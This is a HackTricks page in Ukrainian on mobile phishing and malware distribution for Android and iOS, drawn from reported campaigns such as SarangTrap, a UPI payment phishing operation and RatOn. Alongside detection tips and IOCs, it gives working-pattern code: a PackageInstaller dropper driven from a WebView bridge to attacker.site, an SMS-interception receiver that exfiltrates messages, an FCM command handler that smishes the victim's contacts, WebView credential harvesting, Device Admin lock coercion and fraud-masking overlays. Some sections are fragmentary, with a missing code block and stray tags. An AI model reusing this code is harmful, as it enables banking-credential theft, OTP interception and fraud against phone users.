Мобільний Phishing & Розповсюдження шкідливих додатків (Android & iOS)

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

[!INFO] На цій сторінці описано техніки, які використовують threat actors для розповсюдження шкідливих Android APK та iOS mobile-configuration profiles через phishing (SEO, social engineering, підроблені магазини, dating apps тощо). Матеріал адаптовано з кампанії SarangTrap, виявленої Zimperium zLabs (2025), та інших публічних досліджень.

Потік атаки

1. SEO/Phishing Infrastructure

• Реєстрація десятків схожих доменів (dating, cloud share, car service…). – Використовувати ключові слова на місцевій мові та емоджі в елементі <title> для ранжування в Google. – Розміщувати інструкції з встановлення для Android (.apk) та iOS на одній посадковій сторінці.

2. First Stage Download

• Android: пряме посилання на unsigned або APK з «third‑party store».
• iOS: itms-services:// або просте HTTPS‑посилання на шкідливий mobileconfig профіль (див. нижче).

3. Post-install Social Engineering

• Після першого запуску додаток просить invitation / verification code (ілюзія ексклюзивного доступу).
• Код відправляється методом POST по HTTP до Command-and-Control (C2).
• C2 відповідає {"success":true} ➜ malware продовжує роботу.
• Sandbox / AV динамічний аналіз, який ніколи не надсилає валідний код, не бачить шкідливої поведінки (evation).

4. Runtime Permission Abuse (Android)

• Небезпечні permissions запитуються тільки після позитивної відповіді від C2:

<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<!-- Older builds also asked for SMS permissions -->

• Новіші варіанти видаляють <uses-permission> для SMS з AndroidManifest.xml, але лишають Java/Kotlin шлях для читання SMS через reflection ⇒ знижує статичний score, але залишається функціональним на пристроях, які дають дозвіл через AppOps або на старих цілях.

5. Android 13+ Restricted Settings & Dropper Bypass (SecuriDropper‑style)

• Android 13 ввів Restricted settings для sideloaded додатків: перемикачі Accessibility та Notification Listener сірі, поки користувач явно не дозволить restricted settings в App info.
• Phishing‑сторінки та droppers тепер містять покрокові UI‑інструкції, як дозволити restricted settings для sideloaded додатку, а потім увімкнути Accessibility/Notification доступ.
• Новіший обхід — встановлення payload через session‑based PackageInstaller flow (той самий метод, що використовують app stores). Android вважає додаток як встановлений з магазину, тому Restricted settings більше не блокує Accessibility.
• Підказка для триажу: у dropper‑і grep для PackageInstaller.createSession/openSession плюс код, який одразу переводить жертву до ACTION_ACCESSIBILITY_SETTINGS або ACTION_NOTIFICATION_LISTENER_SETTINGS.

6. Facade UI & Background Collection

• Додаток показує нешкідливі вьюхи (SMS viewer, gallery picker), реалізовані локально.
• Тим часом він ексфільтрує:

• IMEI / IMSI, номер телефону
• Повний дамп ContactsContract (JSON масив)
• JPEG/PNG з /sdcard/DCIM, стиснуті з використанням Luban для зменшення розміру
• Опційно вміст SMS (content://sms) Payloads пакуються у батч‑zip і відправляються через HTTP POST /upload.php.

7. iOS Delivery Technique

• Один mobile-configuration profile може запитувати PayloadType=com.apple.sharedlicenses, com.apple.managedConfiguration тощо для запису пристрою в «MDM»-подібний supervision.
• Інструкції соціальної інженерії:

1. Відкрити Settings ➜ Profile downloaded.
2. Натиснути Install тричі (скріншоти на phishing‑сторінці).
3. Довіряти unsigned профілю ➜ attacker отримує entitlements для Contacts та Photo без перевірки App Store.
4. iOS Web Clip Payload (phishing app icon)

• com.apple.webClip.managed payloads можуть прикріпити phishing URL на Home Screen з брендовою іконкою/назвою.
• Web Clips можуть працювати повноекранно (ховають UI браузера) і бути позначені non‑removable, змушуючи жертву видаляти профіль для видалення іконки.

9. Network Layer

• Прості HTTP, часто на порту 80 з HOST header типу api.<phishingdomain>.com.
• User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; Pixel 6 Build/TQ3A.230805.001) (відсутність TLS → легко виявити).

Поради для Red‑Team

• Dynamic Analysis Bypass – під час оцінки malware автоматизуйте фазу вводу invitation code з Frida/Objection, щоб дістатися до шкідливої гілки.
• Manifest vs. Runtime Diff – порівняйте aapt dump permissions з runtime PackageManager#getRequestedPermissions(); відсутність небезпечних perms — червоний прапор.
• Network Canary – налаштуйте iptables -p tcp --dport 80 -j NFQUEUE для виявлення нестабільних POST‑сплесків після введення коду.
• mobileconfig Inspection – використовуйте security cms -D -i profile.mobileconfig на macOS, щоб перелічити PayloadContent і помітити надмірні entitlements.

Корисний фрагмент Frida: Auto-Bypass Invitation Code

Індикатори (Загальні)

/req/checkCode.php        # invite code validation
/upload.php               # batched ZIP exfiltration
LubanCompress 1.1.8       # "Luban" string inside classes.dex

Android WebView Payment Phishing (UPI) – Dropper + FCM C2 шаблон

Цей шаблон спостерігався в кампаніях, що використали теми державних виплат для викрадення Indian UPI credentials та OTPs. Оператори ланцюжать авторитетні платформи для доставки та стійкості.

Ланцюг доставки через довірені платформи

• YouTube video lure → в описі міститься коротке посилання
• Коротке посилання → GitHub Pages phishing-сайт, що імітує легітимний портал
• Той же GitHub repo хостить APK з фейковою відміткою “Google Play”, яка посилається безпосередньо на файл
• Динамічні phishing-сторінки розгорнуті на Replit; канал віддалених команд використовує Firebase Cloud Messaging (FCM)

Dropper з вбудованим payload та офлайн-встановленням

• Перший APK — installer (dropper), який містить реальний malware у assets/app.apk і просить користувача вимкнути Wi‑Fi/mobile data, щоб зменшити ефективність cloud detection.
• Вбудований payload встановлюється під невинною міткою (наприклад, “Secure Update”). Після встановлення і installer, і payload присутні як окремі додатки.

Static triage tip (grep for embedded payloads):

unzip -l sample.apk | grep -i "assets/app.apk"
# Or:
zipgrep -i "classes|.apk" sample.apk | head

Динамічне виявлення endpoint через shortlink

• Malware отримує список живих endpoints у простому тексті, розділений комами, зі shortlink; прості перетворення рядків формують фінальний шлях до phishing-сторінки.

Приклад (очищено):

GET https://rebrand.ly/dclinkto2
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
Transform: "gate.html" → "gate.htm" (loaded in WebView)
UPI credential POST: https://sqcepo.replit.app/addup.php
SMS upload:           https://sqcepo.replit.app/addsm.php

Псевдокод:

String csv = httpGet(shortlink);
String[] parts = csv.split(",");
String upiPage = parts[0].replace("gate.html", "gate.htm");
String smsPost = parts[1];
String credsPost = upiPage.replace("gate.htm", "addup.php");

WebView-based UPI credential harvesting

• Крок «Make payment of ₹1 / UPI‑Lite» завантажує HTML-форму зловмисника з динамічного endpoint всередині WebView і захоплює конфіденційні поля (телефон, банк, UPI PIN), які POSTяться до addup.php.

Мінімальний loader:

WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm

Self-propagation and SMS/OTP interception

• На першому запуску запитуються агресивні дозволи:

<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>

• Контакти перебираються в циклі для масової розсилки smishing SMS з пристрою жертви.
• Вхідні SMS перехоплюються broadcast receiver і відправляються з метаданими (sender, body, SIM slot, per-device random ID) на /addsm.php.

Ескіз broadcast receiver:

public void onReceive(Context c, Intent i){
SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
for (SmsMessage m: msgs){
postForm(urlAddSms, new FormBody.Builder()
.add("senderNum", m.getOriginatingAddress())
.add("Message", m.getMessageBody())
.add("Slot", String.valueOf(getSimSlot(i)))
.add("Device rand", getOrMakeDeviceRand(c))
.build());
}
}

Firebase Cloud Messaging (FCM) як стійкий C2

• payload реєструється в FCM; push messages несуть поле _type, яке використовується як перемикач для запуску дій (наприклад, оновлення phishing text templates, переключення поведінки).

Приклад FCM payload:

{
"to": "<device_fcm_token>",
"data": {
"_type": "update_texts",
"template": "New subsidy message..."
}
}

Ескіз Handler:

@Override
public void onMessageReceived(RemoteMessage msg){
String t = msg.getData().get("_type");
switch (t){
case "update_texts": applyTemplate(msg.getData().get("template")); break;
case "smish": sendSmishToContacts(); break;
// ... more remote actions
}
}

Індикатори/IOCs

• APK містить вторинний payload у assets/app.apk
• WebView завантажує payment з gate.htm і exfiltrates до /addup.php
• SMS exfiltration to /addsm.php
• Отримання конфігурації через shortlink (наприклад, rebrand.ly/*) з поверненням CSV endpoints
• Додатки, марковані як загальні “Update/Secure Update”
• FCM data messages з дискримінатором _type в ненадійних додатках

Socket.IO/WebSocket-based APK Smuggling + Фальшиві сторінки Google Play

Зловмисники все частіше замінюють статичні посилання на APK на канал Socket.IO/WebSocket, вбудований у принади, що імітують Google Play. Це приховує payload URL, обходить URL/extension filters та зберігає реалістичний install UX.

Типовий клієнтський потік, спостережений у реальних атаках:

</details>

Чому це обходить прості контролі:
- No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames.
- URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO.
- Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload.

See also WebSocket tradecraft and tooling:

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study

Кампанія RatOn banker/RAT (ThreatFabric) є конкретним прикладом того, як сучасні mobile phishing операції поєднують WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, і навіть NFC-relay orchestration. Цей розділ абстрагує повторно використовувані техніки.

### Stage-1: WebView → native install bridge (dropper)
Зловмисники відображають WebView, що вказує на сторінку атакуючого, і інжектують JavaScript interface, який експонує native installer. Торкання HTML button викликає native code, який встановлює second-stage APK, упакований в assets dropper’а, а потім одразу його запускає.

Minimal pattern:

<details>
<summary>Мінімальний патерн Stage-1 dropper (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

<button onclick="bridge.installApk()">Install</button>

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

dpm.lockNow();

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

</details>

Блокуючі оверлеї для прикриття шахрайства:
- Відображати на весь екран `TYPE_ACCESSIBILITY_OVERLAY` з непрозорістю, якою керує оператор; тримайте його непрозорим для жертви, поки під ним працює віддалена автоматизація.
- Зазвичай доступні команди: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Мінімальний оверлей з регульованою прозорістю (alpha):
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);